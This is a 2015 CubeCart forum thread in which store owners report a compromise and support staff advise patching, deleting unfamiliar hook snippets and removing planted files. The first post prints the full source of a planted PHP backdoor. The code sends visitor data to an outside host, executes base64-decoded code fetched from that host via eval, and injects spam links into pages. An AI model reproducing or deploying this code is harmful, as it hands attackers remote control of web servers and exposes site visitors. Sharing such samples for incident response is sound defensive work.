Guest Posted November 12, 2015 Share Posted November 12, 2015 I have been hit by an exploit which can only have come from cubecart.Among various files it has uploaded to my server there is a folder called images/images and in there are numerous files like jiaju12.php jiaju13.phpIf you search for this file name on google you can find many other cubecart sites that are also effected by this exploit. Has anyone come across this before??The code in one of these files looks like this.<?phperror_reporting(0);ini_set("max_execution_time", "1800");$site="http://www.gardenfurniture4u.co.uk/";$dn =$_SERVER['SERVER_NAME']. $_SERVER['PHP_SELF'];$sitearr = parse_url($site);$site_host = $sitearr['host'];$http = $_SERVER['HTTPS'] == "on" ? "https://" : "http://";$dir = preg_replace("/\/[^\/]*?$/i","/",$_SERVER["QUERY_STRING"]);$reqstr = $_SERVER["QUERY_STRING"];$html = "1";$reqstr = str_replace(".js",".js?",$reqstr);header('Content-Type:text/html;charset=utf-8');if(preg_match("/\.css\??/i",$reqstr)){$html="0";header('Content-type: text/css');}if(stristr($reqstr,"css=css")){$html="0";header('Content-type: text/css');}if(stristr($reqstr,"assets/css")){$html="0";header('Content-type: text/css');}if(preg_match("/\.js\??/i",$reqstr)){$html="0";header('Content-type: text/javascript');}if(preg_match("/\.(jpg|png|jpeg|jpe)\??/i",$reqstr)){$html="0";header('Content-type: image/jpeg');}if(preg_match("/\.gif\??/i",$reqstr)){$html="0";header('Content-type: image/gif');}if(preg_match("/\.ico\??/i",$reqstr)){$html="0";header('Content-type: image/x-icon');}if(preg_match("/\.img\??/i",$reqstr)){$html="0";header('Content-type: application/x-img');}if(preg_match("/\.(xml|wsdl|xsl)\??/i",$reqstr)){$html="0";header('Content-type: text/xml');}if(preg_match("/\.bmp\??/i",$reqstr)){$html="0";header('Content-type: application/x-bmp');}if(preg_match("/\.doc\??/i",$reqstr)){$html="0";header('Content-type: application/msword');}if(preg_match("/\.wmv\??/i",$reqstr)){$html="0";header('Content-type: video/x-ms-wmv');}if(preg_match("/\.xls\??/i",$reqstr)){$html="0";header('Content-type: application/x-xls');}if(preg_match("/\.tif\??/i",$reqstr)){$html="0";header('Content-type: image/tiff');}if(preg_match("/\.(asf|asx)\??/i",$reqstr)){$html="0";header('Content-type: video/x-ms-asf');}if(preg_match("/\.exe\??/i",$reqstr)){$html="0";header('Content-type: application/x-msdownload');}if($html=="1"){$ip = $_SERVER["REMOTE_ADDR"];$useragent = urlencode($_SERVER["HTTP_USER_AGENT"]);$referer = urlencode($_SERVER["HTTP_REFERER"]);$http = isset($_SERVER['HTTPS']) ? "https://" : "http://";$mirror_addr = $http.$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."?".urlencode($_SERVER["QUERY_STRING"]);$data = gethttp("http://beautifulrealhairwigs.com/api/api.php?cmd=jiajulinks","ip=$ip&useragent=$useragent&referer=$referer&mirror_addr=$mirror_addr");@eval(@base64_decode(@get_key("evalcode")));}function get_key($str){global $data; preg_match("/$str:(.+)/",$data,$array); return count($array)>0 ? $array[1] : "";}function get_link(){ $link_arr = explode("\r\n",base64_decode(get_key("links"))); return get_next_arr($link_arr);}function get_next_arr($arr){global $arr_i; if($arr_i>=count($arr)-1) { $arr_i = 0; return $arr[$arr_i++]; } $result = $arr[$arr_i++]; return ($result == "") ? get_next_arr($arr) : $result;}function get_keyword(){ $keyword_arr = explode("\r\n",base64_decode(get_key("keywords"))); return get_next_arr($keyword_arr);}function gethttp($url,$postdata){$url = str_replace("://",":||",$url);$url = str_replace("//","/",$url);$url = str_replace(":||","://",$url);$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);if($postdata != "")curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);if(substr($url,0,5)=="https")curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);if(substr($url,0,5)=="https")curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);if($postdata != "")curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");curl_setopt($ch, CURLOPT_REFERER, "http://www.googlebot.com/bot.html");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_MAXREDIRS, 3);$data = curl_exec($ch);curl_close($ch);return $data;}$postdata = "";foreach($_POST as $key=>$val){ $postdata .= urlencode($key)."=".urlencode($val)."&";}$content=gethttp($site.$_SERVER["QUERY_STRING"],$postdata );$content = str_replace("(0<=b.indexOf(\"?\")?\"&\":\"?\"","(0<=b.indexOf(\"?\")?\"?\":\"?\"",$content);if(stristr($reqstr,"jquery")==false && stristr($reqstr,"ckeditor")==false && stristr($reqstr,"prototype")==false && stristr($reqstr,"effects")==false && stristr($reqstr,"dragdrop")==false && stristr($reqstr,"capture.js")==false && stristr($reqstr,"varien/")==false){$content = str_replace("$site_host","$dn?",$content);$content = str_replace("http://www.www.","http://ww.",$content);$content = str_replace("google-analytics","google",$content);$content = preg_replace("/\s(src|href|action|data-backtoshopping|window\.location|data-src)\s*=\s*(\\\\?)(['|\"]?)\.?\/([a-z0-9])/i"," $1=$2$3{$http}{$dn}?/$4",$content);$content = preg_replace("/\s(src|href|action|data-backtoshopping|window\.location|data-src)\s*=\s*(['|\"]?)(?!.*(http|\/\/))/i"," $1=$2$3{$http}{$dn}?",$content);$$content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(\..*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?{$dir}$3$2)",$content);$content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(\/.*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?$3$2)",$content); if(stristr($reqstr,".css")) { $content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(?!.*(http))(.*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?{$dir}$4$2)",$content); } else { $content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(?!.*(http))(.*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?$4$2)",$content); }$content = str_replace("img src=\"i","img src=\"{$http}{$dn}?i",$content);$content = str_replace("51.la","",$content);}$content = str_replace("</html>","",$content);echo $content;if($html=="0")exit;?><style type="text/css">.footer-container { width: 100%; height: auto; position: relative; overflow: hidden; }#footer { width: 70%; margin: 0px auto; }#footer-container { margin: 0px; padding: 25px 10px 10px; width: 100%; height: auto; position: relative; overflow: hidden; }#footer { background-color: rgb(178, 34, 34); margin-top: 1.4em; color: rgb(255, 255, 255); }#footer a { color: rgb(255, 255, 255); text-decoration: none; font-size: 10pt; }#footer ul { list-style: none outside none; margin: 0px; }#footer .col, #footer .section { float: left; margin-right: 1.5em; }#copyright { bottom: 0px; color: rgb(153, 153, 153); font-size: 0.8em; margin-top: 2em; position: absolute; right: 3%; }</style><div id="footer"><div class="wrapper"><div id="footer-container"> <div id="ezinearticles-nav" class="section"> <div class="col"> </div><?php for($i=0;$i<10;$i++) { echo "<ul class=\"col\"><li><a href=\"".get_link()."\">".get_keyword()."</a></li></ul>\r\n"; }?> <div class="border-bottom-cover"></div> </div> <p id="copyright">? 2015 SparkNET<br>All Rights Reserved Worldwide</p></div></div></div></html> Quote Link to comment Share on other sites More sharing options...
bsmither Posted November 12, 2015 Share Posted November 12, 2015 Please read this conversation.Apply the code edits.Remove any files you do not recognize. Quote Link to comment Share on other sites More sharing options...
Guest Posted November 12, 2015 Share Posted November 12, 2015 I already removed everything that looked dodgy but how did it get on my server? there is only cubecart installed Quote Link to comment Share on other sites More sharing options...
bsmither Posted November 12, 2015 Share Posted November 12, 2015 We know how. I won't go into the details.Apply the code edits mentioned in the security update notice. Delete the snippets from admin and your site's folders as described in the conversation you've just read. Quote Link to comment Share on other sites More sharing options...
Al Brookbanks Posted November 12, 2015 Share Posted November 12, 2015 (edited) Hi @brutonWhat version of CubeCart were you running when this happened?If you want our staff to clean up your store, make sure it's patched to the latest version and that any bad files left behind are removed please send a tech support ticket. Edited November 12, 2015 by Al Brookbanks Quote Link to comment Share on other sites More sharing options...
Frank Auffret Posted December 18, 2015 Share Posted December 18, 2015 (edited) I just had similar with Cubecart 6.0.8Since the previous attack I regularly check all Cubecart sites (all 6.0.8) and today I found a code snippet in the hooks I went through all the files and removed anything that was either not supposed to be there or redundant. Checking the staff logs I spotted this entry but no username.Dec 14 2015, 22:41 PM 93.115.95.216 Yedited to add this site was not previously attackedI found this file in the root adminer.php Edited December 18, 2015 by Frank Auffret update malicious file found in root Quote Link to comment Share on other sites More sharing options...
bsmither Posted December 18, 2015 Share Posted December 18, 2015 Please look in admin, Manage Hooks, Code Snippets tab. If you do not recognize a snippet in this list, delete it.Snippets are databased and the snippet file will be created if not found when looked for. Quote Link to comment Share on other sites More sharing options...
Frank Auffret Posted December 21, 2015 Share Posted December 21, 2015 Hi bsmitherThanks for your reply. I did remove the snippet from the table as well and I checked all of my CC sites today to make sure there's nothing malicious. Although three of them were affected earlier this month, this particular site hasn't been attacked before. I added the admin fix last September when the security alert was posted and I have now upgraded each site to 6.0.8.Just left wondering how these snippets and files get uploaded? Quote Link to comment Share on other sites More sharing options...
havenswift-hosting Posted December 21, 2015 Share Posted December 21, 2015 If the store has been patched to the latest version, the snippet file removed and also removed from the database then that should secure the site completely. There have been no other reports of any security issues or problems across all other CubeCart websites. If you are convinced that you completed all three parts of the cleanup and still got hacked then you need to speak to your hosting company or a CubeCart technical specialist who can investigate the various logs to determine the causeIan Quote Link to comment Share on other sites More sharing options...
Al Brookbanks Posted December 21, 2015 Share Posted December 21, 2015 If the store has been patched to the latest version, the snippet file removed and also removed from the database then that should secure the site completely. There have been no other reports of any security issues or problems across all other CubeCart websites. If you are convinced that you completed all three parts of the cleanup and still got hacked then you need to speak to your hosting company or a CubeCart technical specialist who can investigate the various logs to determine the causeIanI just wanted to confirm that I am in agreement with this advice. Quote Link to comment Share on other sites More sharing options...
Frank Auffret Posted December 22, 2015 Share Posted December 22, 2015 The store (5.2.16)was patched on September 7th and upgraded to 6.0.8 on December 9 shortly before the attack - spotted on December 18. I upgraded all other sites at same time so would have checked for malicious folders, files and snippets in includes/extra (can't remember if I checked the table though).It's a dedicated webserver so I'll see if I can find out when the file adminer.php was uploaded and the code snippet added to the table. I can see from the Cubecart staff access logs there are two successful admin logins recorded with no admin username and dodgy IP numbers.Dec 14 2015, 22:41 PM 93.115.95.216Nov 28 2015, 04:12 AM 142.4.213.25All other login IP's check out OKIt looks like access was made without a username on December 14. & November 28. Was it possible to do this using the original security issue?Is there anything else I should check? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.